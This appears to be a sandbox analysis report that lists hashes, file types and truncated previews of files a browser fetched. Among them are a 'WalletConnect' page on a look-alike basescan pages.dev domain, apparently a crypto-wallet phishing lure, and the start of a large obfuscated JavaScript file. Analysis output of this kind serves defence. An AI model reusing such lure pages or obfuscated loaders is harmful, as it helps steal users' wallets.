                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):804
                                                                                                                                                                                                                                              Entropy (8bit):7.710124054639858
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7KRfw8vjL+O/gjR+YKgFiAmJU/D2obZsmqooPinPLbKfAhcEFUlaEHZRrmZT5:FRY87LX/4RDFij0C2sm9PLNyf1m81m9
                                                                                                                                                                                                                                              MD5:A564D5F6C69B3210A7F52F98D065500B
                                                                                                                                                                                                                                              SHA1:48B3876F58E508DD1F7A25ADD24B29F84018F2F3
                                                                                                                                                                                                                                              SHA-256:26B96724D0D14EAFE58428ECBCFE62D9A2FE0C1D7CCF46FDFF3BFF4E1BE8108B
                                                                                                                                                                                                                                              SHA-512:C4F028A3647D1DE0C8154547CE482FBCBCD72CE16B265DF0AD776294D1AF60EE24EA20DC3ECEC6BE8BBFF3DD3CF8F0DAFBD865D8E31A2333E65AE5E6E47C52AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/cexio_20.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................qiCCPicc..x..;HBQ...Z...j.h..5%DE4.E.$..h5t...{.{...Uh.d5.4.....A.......=H).A.........w%..V.8.F....R,.".=.. ...-.V>.Y..>nq....Y.......K.f.Yp..Lo...@...5....\...+5....q#lF.s...).`..j...O.^M74..5..-....t&......X$H...".....@."L....!.|.".Y2.H.CGF.#..w.Vrr..W..Z.l.m...Z...C........|..3..).{......zO..-.x.....p'..z.]q..U...:.w.-......h.z....1...|...J.r..7s....nIDATx.T.J.1..(...y......W/*z....WY.EOz.O.q....."...A...G....v...<..$/.....)..;.......Gg".....!.a.m!...~A~.,.a..[.ju..."{.a.lbI2&..Y. .2......H.4..Dt...Z......+...MfD.N..M......3.....h....yK.9...6...~.|)/._.O.V.XSw.:..UQ*......D.1......<p.?5.M...69x....P.re.Q.<..\b~..G!..!.\.*..}.?V.x.]..}... }a.@A[_.................s.... z..}..nc........i.O.........IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1398
                                                                                                                                                                                                                                              Entropy (8bit):6.1301649626139065
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Ldkzum8COZNDsLlpGPUc6QlM7lQHbXavUZup5Fyz8Sq+xvaPlEpzD:+ZYjwdklfll0xl4lDdEtaPEzD
                                                                                                                                                                                                                                              MD5:F37A5DD9385D3FFD332A85C53A9A993D
                                                                                                                                                                                                                                              SHA1:A7FDF6AC0EBD0FD8FC88C401FA014045A59CE2E6
                                                                                                                                                                                                                                              SHA-256:82935632DE01916B4518DF73AF74EC8D83D8A0CEA80B985EBE92E17B21370E2A
                                                                                                                                                                                                                                              SHA-512:1F3CD6C3894E9D86347CCA8AB9D6AB9915E352F2CE919E7F59812FAD334C76CD98157D4B8671895C88BF375F7D33A3964643108BACFEF100F5E81501174EF8D9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/15935_Sugar%20rush%201000.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...C...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................Kmdat........0@CA.2.......1...._........6...@.KK9y...~^......RA...Um..I3/.k$J..H;#.(.Z.f.U.(.EBn....Vs.........1.;dHzx).....m.*.gQ..T..!.....q......;8M..n..?....l.s.@..z....B.}.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):157148
                                                                                                                                                                                                                                              Entropy (8bit):7.940778290451087
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:3pRwYooDtJp1QIzK7/NEzu8WJVAX+givWyQ+yfhATH0OADHD8f:5dDtJUGDiJV0fqAhATUef
                                                                                                                                                                                                                                              MD5:C885CFCE4701FFAC22B7F9D588A4BCFD
                                                                                                                                                                                                                                              SHA1:866CE794A106B362FA5401810842322A253CB58F
                                                                                                                                                                                                                                              SHA-256:8D93F9C2ABA7C369853A1111BF1D84F6B55DFBF405E43FCA4475C343AEDB02CE
                                                                                                                                                                                                                                              SHA-512:CED84A134F502D87F62859CF0AB47FF04B6513C8ABB8787D9D8600E92831256C6A72A5705A612E94A0FC21C39116E5B2A1950E49D4F8B78C6C56322155BA6BC1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.......~.....PLTE...cc..\.U_d..."XQ....K.......... _T..D....NF....ip...@..1.J........z'..l..0|...\`r.JA.uS....W>......................m..i..d|._u..........~.................................K..r........d....|....v..B....]..p..i..o..8..k..d..#..R.h.c.v.`.c.].Y.J..4.^.U.!..B.H.R.Y....F.E.U.N..?..f...C.P.>.L..(.?..V..I..=..O. .;..H.<..C.....F..... .6..:..F..9..?..............;.....5..2..9...........6.....,...........7..3..8..'..F...........2.....#..2.....+..0........!.....#...~....-..(......{...}...+..:.|&x..z.!.|)z..z..u...w#.x'w...z.s..t..t...s .t%o..q..k...o.o...p#l..m...w..l.l..j...l g..f..h|..g..h.fx.d|.bz.cw..c.ax..c.^u._r..^.}_.\r.]o.Zo.le.}Z.y[.Wk.|W.uX.Vf.Sg.qU.nT.uR.Q`.mQ.N`.M[.kI.eJ.HX.aF.DT.AP.\B.V@.>L.V=.:F.2;.0&...!....4tRNS.!">>bben}...........................................S.p..bWIDATx..................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3993
                                                                                                                                                                                                                                              Entropy (8bit):5.258539030573499
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:94E7BTGIapybNs1LIMV7w5zc91MXlGw5zqnfkLB1h2O/pGCpKNsuWQOHmVztQPQS:vTccb61sKic1oC8LB1xbmVuPQ79dMD
                                                                                                                                                                                                                                              MD5:AD352C11E662D317BACCDF2F412340E5
                                                                                                                                                                                                                                              SHA1:855D71B0AD2B7FB4FDA1636FFB76AEADACA86F2D
                                                                                                                                                                                                                                              SHA-256:78710B30AC33B793F289F5C34F94D9F55A95A22676EE29DC66372B6B76BD1D03
                                                                                                                                                                                                                                              SHA-512:3F4BC575C0BB6D71B8286EF16E5D2400ECA3FD542366937B56D8A1D01A10378A64692F2238EBE0D9EAEAB9F29CA8486CBDB87F339166DD6AB9BB79BC13D0B54F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/hs.core.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore={init:function(){$(document).ready(function(e){$('[data-toggle="tooltip"]').tooltip({trigger:'hover'});$('[data-toggle="popover"]').popover({trigger:'hover'});$.HSCore.helpers.darkMode();$.HSCore.helpers.detectIE();$.HSCore.helpers.bootstrapNavOptions.init();});},components:{},helpers:{Math:{getRandomValueFromRange:function(startPoint,endPoint,fixed){var fixedInner=fixed?fixed:false;Math.random();return fixedInner?(Math.random()*(endPoint-startPoint)+startPoint):(Math.floor(Math.random()*(endPoint-startPoint+1))+startPoint);}},darkMode:function(){$('#darkModaBtn').on('click',function(){$('body').toggleClass('dark-mode');if($('body').hasClass('dark-mode')){writeCookie("displaymode","dark");$('#darkModaBtnIcon').toggleClass('fa-moon fa-sun');$('#logo-header').attr('src','/images/logo-white.svg?v=0.0.4');window.mode='dark';$("iframe").each(function(){var src=$(this).contents().find('body');src.addClass('dark-mode');src.attr('style','background: #112641
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (656)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):657
                                                                                                                                                                                                                                              Entropy (8bit):5.092141398918879
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:nLvsSEcCEU5oNDFgDkRIc+iH6UvkLrdQcCeIiPF8PvTwzBT:nTstcCEUSFFvyGkLZTmI
                                                                                                                                                                                                                                              MD5:CCF193487B1500A9A0927429EEC046E6
                                                                                                                                                                                                                                              SHA1:7232C109C74BFB22756FCCD35C67A5818525B3FD
                                                                                                                                                                                                                                              SHA-256:6E5052D6A01FA3C8C664F1241A70C1CDCC4077D82094CD311004462828A47385
                                                                                                                                                                                                                                              SHA-512:7D052EF3E9566678666AA17877D9451C597C7635BEDCA4481705FB655D86B39696A4158684D6F5DB553441C8393B01B919A4445E4868D5115ADF0A04AC3FD31E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/_baseGetTag-c2e287b9.js
                                                                                                                                                                                                                                              Preview:var l=typeof global=="object"&&global&&global.Object===Object&&global;const f=l;var g=typeof self=="object"&&self&&self.Object===Object&&self,s=f||g||Function("return this")();const j=s;var S=j.Symbol;const r=S;var n=Object.prototype,d=n.hasOwnProperty,T=n.toString,e=r?r.toStringTag:void 0;function y(t){var a=d.call(t,e),c=t[e];try{t[e]=void 0;var b=!0}catch(m){}var i=T.call(t);return b&&(a?t[e]=c:delete t[e]),i}var O=Object.prototype,u=O.toString;function p(t){return u.call(t)}var v="[object Null]",$="[object Undefined]",o=r?r.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:o&&o in Object(t)?y(t):p(t)}export{r as S,h as b,f,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (3355)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3360
                                                                                                                                                                                                                                              Entropy (8bit):5.36435787049408
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:1g36JaLWPSCZIE3l7elNAuqICR3saS4VSfU:1g36CWaCZJYljpCR3sV4VR
                                                                                                                                                                                                                                              MD5:69AD3A065B3D457B56360F0913C38EED
                                                                                                                                                                                                                                              SHA1:341893AA1E3A15613B272A7127F136CB2DAD0E7B
                                                                                                                                                                                                                                              SHA-256:704A440CEBE4BA6A0CA683FE8B22D5FCDDF4E43BFF82A64B68FF0600BD500C28
                                                                                                                                                                                                                                              SHA-512:2573BEE72DE00AB76C833AF392C17D1DCA435D59264E70B655B9ABC02A16754FFC9004FE0D522BE6CD506E6C8CE655411963741CF22D4FF5BD3DFB61D37CCD0F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{ab as m,c as t,ac as f,Q as b,p as _,C as i,l as g,s as u,i as l,t as n,B as v,ad as w,ae as k,a9 as y,f as p,G as B,r as A}from"./index-DD2Zk4iT.js";import{showBlock as Z}from"./Block-LQQkMNS-.js";import{t as S,a as C,b as G,c as P,i as E,d as O,e as I}from"./discord-3fjpJq_P.js";var Q=p('<div class="w-full flex-col center"><div class="mt-4 rounded-full border-solid border-brand font-extrabold center size-12 border-4">18+</div><div class="mt-2 text-lg font-extrabold"></div><p class="mt-4 text-center"></p><span class="mt-4 cursor-pointer mb-6">'),x=p("<img alt=logo class=h-8>");const U=function(){f.pause();const o=b(()=>_.assets(`/logo/logo${i.darken?".png":"_w.png"}`)),e=()=>{m.pop(),f.start(),localStorage.setItem("isOlder18","older")};return t(w,{close:!1,type:"center",class:"w-full sm:w-[480px]",get title(){return(()=>{var r=x();return g(()=>u(r,"src",o())),r})()},get children(){var r=Q(),d=r.firstChild,a=d.nextSibling,c=a.nextSibling,s=c.nextSibling;return l(a,()=>n("Are you
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (729)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):730
                                                                                                                                                                                                                                              Entropy (8bit):5.206460158265451
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:yXp2VcZqmjT6P0uMRSPK6NFg4n382jVUQnIRzMnVAC8RC6yUDj1Huoy:O79SlNFj382hUQnsEWZ9Huoy
                                                                                                                                                                                                                                              MD5:0E3797C05E05F5322A9DEE58FE5EE593
                                                                                                                                                                                                                                              SHA1:21F1C73A032A368B64340F636F5502398087F34C
                                                                                                                                                                                                                                              SHA-256:A4D8784D77AB5FE0BD3EA2AED6DA8899D59E39686DD33C15B4BBDD7584D307D6
                                                                                                                                                                                                                                              SHA-512:1C1C13AB1A7727DFFE45CFB5F7E4ACB7C61437491A21B88AAE7CE4BD12D58942140BE4858A0D8F95CF914866E66A5D3CC01713A7183339FD66354181F6D7D94F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{j as u,b as f,i as t,e as d,a as b,t as g}from"./web-13cf6287.js";import{a6 as P,c as n}from"./manifest-51a3674f.js";import{L as _}from"./index-3fd48be3.js";import{i as $,m as h,b as v,d as x}from"./solid-js-38561dfe.js";var w=g("<span><span></span><span class=invisible>");const j=o=>{const[i,r]=$(o,["number","duration","children","from","ease"]),e=h({duration:3e3,from:0,ease:_.easeInOut},i),[l,m]=v(e.from),c=P(l,{duration:e.duration,ease:e.ease});return x(()=>{m(e.number)}),(()=>{var a=w(),s=a.firstChild,p=s.nextSibling;return u(a,f(r,{get class(){return n("relative text-nowrap",r.class)}}),!1,!0),t(s,()=>e.children(c())),t(p,()=>e.children(e.number)),d(()=>b(s,n("absolute left-0 top-0"))),a})()};export{j as A};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2322573
                                                                                                                                                                                                                                              Entropy (8bit):4.856021616319524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:orw5o9lsIvMZ0+11n76y3lwbjlMLNuRwzU3CaZioDHlfndDKrbMlFeCEI7zKaY06:7
                                                                                                                                                                                                                                              MD5:3C165D806925C83D6DD9AC857FA37903
                                                                                                                                                                                                                                              SHA1:8FE5FC9456691E9367098C3405813C530DFD9C43
                                                                                                                                                                                                                                              SHA-256:1A4AA175873998CCCEE1C1FC2B4C0F5B9E3ED38ACD31D02033147176B9A86439
                                                                                                                                                                                                                                              SHA-512:F230C24613C98F729625890A4CD08B6F7B5ACB148140F5265E42694D29768DA646C8D4D02CA25E1F5CB2D31360311AAC08186647B49DA00DFA58C41C1CCCA97E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(_0x13f36f,_0x2e81b1){const _0x58d0b7=_0x13f36f();function _0x5c7281(_0x287d2e,_0x2333ab,_0x227013,_0x256fbf){return _0x16e3(_0x256fbf-0x97,_0x287d2e);}function _0x3eca8e(_0xeb329b,_0xc5c91,_0x50aa87,_0x2258b9){return _0x16e3(_0x50aa87- -0x19a,_0xeb329b);}while(!![]){try{const _0x48be94=-parseInt(_0x5c7281(0xe2d,0x4f1,0xf7d,0x55d))/(0x2c1*0x4+-0x46c+-0x1*0x697)*(parseInt(_0x3eca8e(0xf52,0x6e9,0x5a6,-0x3c6))/(0x1770+0x9f1*-0x1+-0xd7d))+-parseInt(_0x3eca8e(0x6c9,0xf53,0xb52,0x6d2))/(0x10a1+0x798+-0x812*0x3)*(parseInt(_0x5c7281(-0x280,0xcf9,0xed1,0x630))/(-0x5*-0x227+-0x2*0xdc4+0x10c9*0x1))+-parseInt(_0x5c7281(0x1ba4,0x158f,0x1506,0x16ee))/(-0x13*0x187+-0x1c6*-0x2+-0xd*-0x1f6)+parseInt(_0x5c7281(0xde6,0x17f4,0x1be4,0x1566))/(-0xf7d+-0x2a6*0x1+0x1229*0x1)+parseInt(_0x3eca8e(0x11d1,0xf46,0xe19,0x6e7))/(0xb69*-0x2+0x1*0xb8+0x46d*0x5)*(parseInt(_0x3eca8e(0x1500,0x142e,0x140d,0x19a3))/(0x19*0x7b+-0xdad+-0x3e*-0x7))+parseInt(_0x3eca8e(0x99e,0xa7e,0xf7f,0x8be))/(0xf*-0x127+-0x1ac0+-0x1*
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 32 x 33, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                                                              Entropy (8bit):7.33602222614592
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:2aHE3dIWfY1ZHzWqvyOrczlzRWpTquJ3CaN:2TuQYLxLK1WpTq+3RN
                                                                                                                                                                                                                                              MD5:C7E2CEFB07273C9E62CF31DD5D511981
                                                                                                                                                                                                                                              SHA1:4B916DB33A0A4E2D80ECF696134D1A8F508C0B21
                                                                                                                                                                                                                                              SHA-256:0C108CF21FCE23B49EDEA65FDF6800FFDAC0C76E695DE275BEFD0B66D2FF0E8C
                                                                                                                                                                                                                                              SHA-512:94BEF2E32831552F6701F4C828F86A741CC4E42ABBE593ADC9C73430E709C71C000E9094C285E5263EC44C191E4C821367C6213F0467B6280CEBAE578A67407D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR... ...!.......Yc....sRGB.........gAMA......a.....PLTE........................U..U.U...U.U......f..f.ff....f.f...m..m.mU....m.m.mU.I.m...q..`..`..U.qq.`.U.qt..f..f..]..t.f.].].tM.j..b..j.b.b.vU.m..[..U..f.[..U.Z..`.`.Z..P.c..c..c.c.^.U.Q.U.U.Y..f.a.Y.U.Y.U.Y.Y..].Y.Q.Q.].Y.Q.U.R..U.R.U.X..U..N..X.U.R..O..X.R.R..O.R.U.R.U..P.M..P.M..R..P.R..P..K..I..N.N.L.N.L.L.J.H.J.H.D.F.F.D.3p61....tRNS..........................................................................................................! ! !"#"#"#$$%$%%&'&')(()w.......IDATx...n.0.E9h.l..M...3x.,Qd...H...]I..g!R..af"....G3.jg....f.@.^...@N...{.....0...8...:...z.=.n.<,T..P...0.....-..`Q....e0..O..B........40x...8<..,.Lk.............t......8z.'`..p..R.~.O.&..O.u...F.!.if&.q./.A..q.SH.c..}....0......9U?b.A@..=...L...W.+8....z[..V......'..%d.V.W.....H...CY..-j..m.W96.J..n.CZ....{+..]."0{..A..Z.......$..g...R^.K...`.YE.7...........p'.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2094
                                                                                                                                                                                                                                              Entropy (8bit):7.811279990241959
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:ulfWfsPKMQgSeqpSeliTK50HBk37IdVzyuQZ3NVBdZ9kSPnVTuryNOeqCiJp:ul+fs8sqpplr50HTd4uQNkSvVTe0iv
                                                                                                                                                                                                                                              MD5:98744AD2BD86ABB50AA0C53E97EF8659
                                                                                                                                                                                                                                              SHA1:7C4031FFC120E013261159D5D8798D1FDCDBD669
                                                                                                                                                                                                                                              SHA-256:44EF9E216E014F14F5257C58FCBE5F497E56BFF5A62F1E099C5602937748748C
                                                                                                                                                                                                                                              SHA-512:E95DBE4CD864D58794749E7883B55D5949AADFBFFE658E6707E6A48FE474E0B9C0051212AF8F8416E505FB0D67C3A3BE21A00C704439FF64FEB05C7A33C3690D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....sRGB.........PLTE........................................................................y.r.q.p.n.o.h.d.a.`.^.Z.[.Y.Y.U.U.S.O.M.K....................................................................................................................................................................................................................................................}.|.{.z.z.x.w.v.u.t.s.s.r.q.p.o.n.j.i.h.g.f.e.d.c.c.b.a.`._.^.^.].\.[.Z.Y.X.W.V.U.S.Q.Q.P.O.N.N.M.L.K.J.I.H.G..u....2tRNS........."#'(09=OX\`l....................................IDATx...[TE.....\.X. ....+...&(V.H.3.R...eVV^.J.R.(.2K.....L..F.....z.=..Yf.rfw...q...sfv..3.]...E%....ZOEIQnvz..RrV.....d....J.Q..FQJt.cT.D...z.R.?.".Z.....RI_...Z...)...n.$.c....d[F."T.A...!.yqdCR..R.D.J.B..Rh..j...q...I..I
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
